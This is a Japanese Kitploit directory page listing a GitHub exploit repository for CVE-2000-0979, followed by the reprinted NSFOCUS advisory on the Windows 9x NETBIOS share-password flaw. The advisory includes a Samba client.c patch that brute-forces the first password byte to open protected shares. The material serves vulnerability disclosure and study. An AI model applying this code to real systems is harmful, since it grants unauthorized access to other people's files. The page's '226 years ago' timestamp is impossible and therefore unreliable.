Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
ツール/GitHubGitHub/z6543/cve-2000-0979
エクスプロイトフレームワーク脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

リポジトリを見る
226年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2000-0979

CVE-2000-0979.rb は、Windows 95 の SMB サービスに対する CVE-2000-0979 のエクスプロイトを行うスタンドアロンツールです。

msf_2000_0979.rb は Metasploit モジュールです。これを ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩ にコピーできます。

MSFモジュール

詳細なドキュメントは近日公開予定です!

元のアドバイザリ

NSFOCUS セキュリティアドバイザリ (SA2000-05)

トピック: Microsoft Windows 9x NETBIOS パスワード検証の脆弱性

リリース日: 2000年8月24日 更新日: 2000年10月11日

影響を受けるシステム

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

影響を受けないシステム

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

影響

Microsoft Windows 9x の NETBIOS プロトコル実装で使用されるパスワード検証方式に脆弱性が存在します。この脆弱性により、任意のユーザーがパスワード保護された Windows 9x のファイル共有サービスにアクセスできるようになります。攻撃者は共有パスワードを知る必要はありません。

説明

Microsoft Windows 9x システムの共有リソースを保護するためにパスワードを設定することができます。しかし、Microsoft Windows 9x の NETBIOS プロトコル実装で使用されるパスワード検証方式に脆弱性が存在します。パスワードを検証する際、パスワードの長さはクライアントからサーバーに送信されるデータの長さに依存します。つまり、クライアントがパスワードの長さを1バイトに設定し、平文のパスワードを含むパケットをサーバーに送信すると、サーバーは共有パスワード(平文)の最初の1バイトのみと比較し、一致すれば検証プロセスが完了します。攻撃者は被害者のパスワードの最初の1バイトを推測して試すだけで済みます。Windows 9x のリモート管理システムも同じ共有パスワード認証方式を採用しているため影響を受けます。

エクスプロイト

このバグを示す簡単な例を以下に示します。 Get samba source package and modify source/client/client.c like this:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

回避策

Microsoft のファイルとプリンタの共有サービスを閉じる。

解決策

Microsoft はこの問題について通知を受けており、この欠陥に関するセキュリティ情報を公開しています。

情報は以下で公開されています:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

パッチは以下から入手可能です:

. Microsoft Windows 95

パッチは近日公開予定

. Microsoft Windows 98 and 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

免責事項

提供される情報は、NSFOCUS によって「現状のまま」提供され、いかなる種類の保証も行われません。NSFOCUS は、商品性の保証を除き、明示的または黙示的なすべての保証を否認します。いかなる場合においても、NSFOCUS は、直接的、間接的、付随的、結果的損害、事業利益の損失、特別損害を含む一切の損害について、たとえ NSFOCUS がそのような損害の可能性について知らされていたとしても、責任を負わないものとします。情報の配布または複製は、アドバイザリが一切変更されていないことを条件とします。

Copyright 1999-2000 NSFOCUS. All Rights Reserved. 利用規約。

NSFOCUS セキュリティチーム [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

ツールをダウンロード